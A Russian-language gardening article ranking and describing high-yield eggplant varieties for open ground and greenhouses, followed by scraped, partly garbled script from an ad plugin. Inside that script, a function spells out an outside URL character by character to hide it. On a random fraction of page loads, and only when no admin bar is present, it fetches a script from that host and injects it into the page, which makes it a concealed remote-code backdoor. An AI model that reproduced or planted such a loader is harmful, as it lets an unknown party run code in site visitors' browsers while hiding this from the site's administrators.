2 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Какие самые лучшие урожайные сорта баклажан

10 лучших сортов баклажанов

Баклажаны, в народе называемые «синенькие», попали в наши огороды из Индии. Там по-прежнему встречаются дикорастущие формы. Огородники относят синенькие к нежным и капризным культурам. Баклажаны требовательны к плодородию и подкормкам, очень теплолюбивы на всех стадиях роста, чувствительны к влажности грунта, не переносят притенение. Огрехи в агротехнике оборачиваются потерей урожая. О том, как выбрать хорошие семена баклажанов, и пойдет речь в нашем обзоре.

Особенности выращивания баклажанов

У баклажанов мощные, крепкие кусты с крупными листьями. Корневая система хорошо развитая, поверхностная, при повреждении долго восстанавливается. Цветки обоеполые, преобладает самоопыление. Перекрестное опыление затруднено из-за тяжелой пыльцы.

В Средней полосе синенькие выращивают рассадным способом, высаживая на постоянное место 55-60-дневные сеянцы. При посадке в открытый грунт используют пленочное укрытие на дугах или разборные парники, защищая растения от возвратных заморозков и сильного похолодания в начале лета. В отличие от томатов, баклажаны имеют чувствительную корневую систему, поэтому для них предпочтительна перевалка.

Плоды употребляют в технической спелости, с сочной мякотью и недоразвитыми семенами. В биологической спелости они накапливают соланин, придающий мякоти горький вкус. Селекционеры вывели сорта с плодами разных формы (цилиндрические, грушевидные, округлые и змеевидные) и окраски (белые, лиловые, сине-фиолетовые, черные).

Рейтинг лучших сортов баклажанов

Категория Место Наименование Рейтинг Цена
Лучшие баклажаны для открытого грунта 1 Шарапова F1 (Нидерланды, 2013) 9.9 / 10 75
2 Эпик F1 (Нидерланды, 2008) 9.9 / 10 35
3 Король Севера F1 (Россия, в реестре отсутствует) 9.8 / 10 55
4 Флоренция (Италия, в реестр не включен) 9.8 / 10 50
5 Клоринда F1 (Нидерланды, 2008) 9.7 / 10 55
Лучшие баклажаны для теплиц 1 Щелкунчик F1 (Россия, 2001) 9.9 / 10 40
2 Жизель F1 (Россия, 2001) 9.9 / 10 55
3 Фаворит F1 (Франция, 2018) 9.7 / 10 35
4 Бегемот F1 (Россия, 1998) 9.7 / 10 20
5 Бибо F1 (Нидерланды, 2008) 9.7 / 10 35

Лучшие баклажаны для открытого грунта

Продолжает наш рейтинг ранний гибрид баклажанов для выращивания на открытых грядках и под пленочным укрытием. Потребительская спелость наступает через 105 — 115 дней после всходов. Образует среднерослый, мощный куст с опушенным стеблем антоциановой окраски. Листья морщинистые, с волнистым краем. Плоды грушевидные, пузатые, глянцевые, насыщенно-фиолетовые, без шипов на чашелистиках, длиной до 20 см, массой 250 — 350 г. Мякоть зеленоватая, плотная, без горечи. Каждый куст завязывает по 10 — 12 плодов. Средняя высота растения (70 — 90 см) требует подвязки к кольям или шпалере. Проявляет хорошую устойчивость к болезням и неблагоприятной погоде. Допущен к выращиванию во всех регионах страны.

Высокоурожайные сорта баклажанов

Баклажаны – непревзойденный овощ. Содержит большое количество белков, минеральных веществ и клетчатки. Поэтому считается диетическим продуктом и ценится за вкусовые качества. Баклажаны получили признание профессионалов гораздо позже других овощей. Дикие виды растения встречаются в Индии, Южной Азии и на Среднем Востоке. Научное название баклажан – паслен темноплодный, народное – синенький.

Хотя это название теперь не совсем подходит. В настоящее время баклажан известен по всему миру и встречается в такой цветовой гамме, что называть его синеньким неуместно. Постоянно появляются новые сорта, обеспечивающие все большую питательную ценность. Поэтому выбирать высокоурожайный сорт баклажан все-таки лучше среди современных видов. Это легко объяснить тем, что селекционеры постоянно работают над улучшением сортов. Каждый новый вид превосходит предыдущие по многим параметрам. Основные сорта баклажанов различаются по:

  • цвету (от белого и черного до полосатого);
  • форме;
  • размеру куста;
  • срокам созревания;
  • вкусу;
  • устойчивостью к заболеваниям.

По срокам созревания выходцы с юга разделяют на:

Если принято решение выращивать полезный овощ, то следует сначала определиться с желаемым сроком получения урожая. В открытом грунте сложностей в период созревания овощей больше. Элитные сорта прихотливы к условиям и требовательны к уходу. Если не заладится погода или подведут знания, то можно остаться без хорошего результата. На урожайность влияют:

  1. Любое колебание температуры окружающего воздуха. Резкое повышение или понижение приводит к опаданию цветов и завязей. Оптимальными показателями считаются 25 – 27 °C. Отрицательная температура и длительное понижение вызывает гибель растений. Ниже +15 °С Семена вообще не прорастают.
  2. Интенсивность освещения . В пасмурную погоду рост баклажанов замедляется. Сильные ожоги от солнца вредны не меньше.
  3. Пересадки . Баклажан плохо переносит пересадку. Любое повреждение корней приводит к снижению приживаемости, ослаблению растения.
  4. Плотность посадки . Загущенные всходы баклажан растут медленно, образуют мелкие плоды.
  5. Состав грунта . Желательно высаживать на легких почвах, хорошо удобрять огород.

Но, для начинающих огородников и тех, кто впервые собирается выращивать баклажаны, есть самые неприхотливые и урожайные сорта. Очень удобны виды, которые подходят для теплиц и открытого грунта одновременно.

Баклажаны ранних сортов

Раннеспелые овощи хороши для выращивания в теплицах. В открытом грунте дают стабильный урожай при благоприятной температуре. Поэтому подходят для регионов с теплым климатом. Выгодны для районов с нестабильной температурой. Раннее созревание дает возможность получить урожай до холодов. Какие сорта заслуживают внимания?

«Алексеевский»

Подходит для открытого и закрытого грунта. Форма классическая для любителей темно-фиолетовой окраски. По весу считается средним баклажаном. Взрослый плод набирает до 150 г, не имеет горечи.

Период созревания до 130 дней. Низкорослое (до 60 см в высоту), полураскидистое растение с хорошей транспортабельностью и высокой урожайностью. Высевать семена начинают в конце февраля, в теплицу рассаживают в середине мая. Для открытого грунта лучшее время – начало июня. Восприимчив к порывам ветра, предпочитает защищенное место для выращивания. Устойчив к вирусным заболеваниям.

«Робин Гуд»

Раннеспелый отличный сорт с высокими адаптационными способностями. Плоды появляются уже через 100 дней после всхода семян. Отличается хорошей выживаемостью, считается подходящим сортом для начинающих огородников. Можно выращивать даже в необогреваемых теплицах без опаски потерять урожай. Имеет крупный плод (до 280г) грушевидной формы и традиционной сиреневой окраски, слабые шипы. Взрослые кусты низкорослые, раскидистые, высотой до 90 см. Ценится за неприхотливость и вкусовые качества. Подходит для всех видов заготовок и может быть высажен на огород с различными условиями выращивания.

«Король Севера F1»

Самый ранний высокоурожайный сорт. Через 90-100 дней после появления всходов можно собирать богатый урожай. Ценится за такие качества, как:

  • хорошая всхожесть семян;
  • холодоустойчивость;
  • отличная завязываемость плодов.

Дает стабильный урожай даже при понижении температуры . Плоды черно-фиолетового цвета, удлиненной цилиндрической формы. Вкусовые качества отменные. Отсутствие горечи в плодах позволяет готовить из них блюда без вымачивания. Высаживается на огород рассадным способом. На плодоножке отсутствуют шипы, что тоже привлекает внимание к данному сорту. В середине мая высаживают рассаду в теплицы. Для открытого грунта приходит время после окончания возвратных заморозков. Рекомендуется выращивать сорт без пленочного укрытия. Это предохранит растения от поражения паутинным клещом. Куст невысокий, плодоносит до осенних заморозков. Плоды длинные, могут касаться земли, поэтому желательно замульчировать почву.

«Фиолетовое чудо F1»

Ранний гибридный сорт баклажан с высокой урожайностью. К достоинствам сорта относится стабильное плодоношение, устойчивость к заболеваниям и поражению паутинным клещом.

Через 95-100 суток после посева плоды готовы к употреблению. Кусты компактные, высотой до 120 см. Плоды не слишком крупные весом до 120-135 граммов. Мякоть непривычного зеленовато-белого цвета без горечи. Пригоден для выращивания для любого типа грунта. Плотность посадки на 1 кв.м всего 5 растений. Это предотвратит загущение и увеличит плодоношение.

«Балагур»

Новый вид – бесшиповый кистевой. Одна кисть содержит до 7 плодов формы вытянутого эллипса с тонкой кожицей. Необычная ярко-лиловая окраска придает баклажану неповторимый шарм.

Мякоть белая, очень вкусная. Раннеспелый сорт, который порадует удивительными плодами уже на 85 день после появления всходов. Куст дает до 50-90 штук качественных плодов при точном соблюдении агротехнических требований. Обладает хорошей устойчивостью против вируса табачной мозаики. Высота кустов достигает 130 см, плотность – не более 5 растений на 1кв. м. Предлагается для выращивания в открытом грунте и теплицах.

«Длинный фиолетовый»

Очень ранний сорт, до спелости плодов от момента высадки на огород проходит всего 85-90 дней. Куст растет очень быстро и компактно, высота составляет не более 55 см. Плоды крупные до 300 г каждый. Ценится за отличную транспортабельность, устойчивость к целому ряду вредителей и болезней, долго сохраняет товарный вид.

Собираем урожай в середине сезона – средние сорта баклажан

После сбора урожая с ранних сортов баклажан приходит очередь высокоурожайных средних разновидностей. Наиболее популярными и завоевавшими доверие огородников, считаются:

«Алмаз»

Испытанный многими поколениями любителей баклажанов. Высокоурожайный, проверенный сорт. Сбор плодов начинается через 110-150 дней после появления всходов. Кусты компактные, не раскидистые, высота которых не более 55 см. Плоды темно-фиолетовые, весом до 165 г с приятным вкусом.

В среднем он составляет 8 кг с 1 кв.м площади. Устойчив к столбуру и мозаике, но подвержен заболеваниям увядания. Отличается хорошей транспортабельностью, что высоко ценится при промышленном выращивании. Подходит для автоматизированной сборки плодов.

«Матросик»

Безалкалоидный высокоурожайный сорт, который украсит не только огород, но и праздничный стол. Очень красивые плоды возместят все усилия по выращиванию овоща.

Имеют полосатую оригинальную окраску и круглую или грушевидную форму. Масса каждого достигает 400 грамм. В конце февраля сеют семена на рассаду. На огород высаживают не ранее 20 мая. Отлично переносит летнюю жару, дает хороший урожай в начале лета и в более поздний срок. Ценится за хорошую устойчивость к основным болезням баклажанов. Собирать урожай нужно осторожно – сорт имеет шипы.

«Лебединый»

Высокоурожайный среднеспелый баклажан с отличным вкусом и белой окраской плодов. Сбор урожая начинается на 100 день после массовых всходов семян.

Возделывают в теплицах и открытом грунте. Кусты невысокие прямостоячие. Растение легко выдерживает жару, обладает устойчивостью к болезням и основным вредителям баклажанов. Плоды белые с нежной мякотью. Изюминкой сорта является мягкий грибной привкус плодов. Отличается высокой урожайностью. С одного квадратного метра получают до 18 кг баклажанов. Семена высевают в середине марта, на огород пересаживают рассаду через 70 дней. Плотность посадки обычная – не более 5 растений на квадратный метр.

«Полосатый рейс»

Среднеспелый сорт, высокоурожайный с неординарным названием. Подходит для посева в открытый грунт и теплицу, даже необогреваемую. Выбор зависит от предпочтения и климатических условий. Пестрая окраска спелых плодов украшает грядки и обеденный стол. Устойчив к изменениям погодных условий, ценится за высокую завязываемость плодов в любых условиях. Мякоть нежная без пустот и горечи, пригоден к замораживанию и сушке. Устойчив к транспортировке.

Урожай в конце сезона

Поздние сорта радуют огородников наиболее сильно. Ведь на исходе лета многие овощи уже закончили плодоношение, погодные условия ухудшаются. А самые позднеспелые баклажаны поставляют к столу богатый набор витаминов, белков и минералов. Какие сорта заслуживают внимания?

«Черный Красавец поздний»

Дает высокий урожай через 130 дней после посадки. Куст невысокий, раскидистый. Плоды оригинальные грушевидные, черно-фиолетовые. Очень крупные, вес одного баклажана достигает 900 г. Хорошо переносит неблагоприятные погодные условия.

«Софья»

Новинка селекционеров. Поздний, дает высокий урожай через 130-145 дней. Крупные плоды имеют форму груши темно-фиолетового цвета. Вес каждого достигает 700-800 г, мякоть хорошего вкуса, светлая. Хорошо противостоит непогоде и привычным болезням баклажанов. Подходит для высадки в открытый огород и тепличного выращивания. Кроме хорошо известных баклажанов, многие растениеводы высаживают на свой огород сорта с удивительной формой плодов:

  • круглой;
  • саблевидной;
  • овальной;
  • яйцевидной;
  • цилиндрической.

Украшают огород баклажаны с плодами необыкновенного цвета.

Самые разные оттенки плодов начиная с белого до темно-фиолетового, радуют глаз в течение сезона. Получить высокий урожай баклажан розового, красного, желтого цвета или в полоску – гордость каждого огородника.

Заключение

Выбирая сорт, стоит учитывать все нюансы и придерживаться рекомендаций по агротехнике баклажанов.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};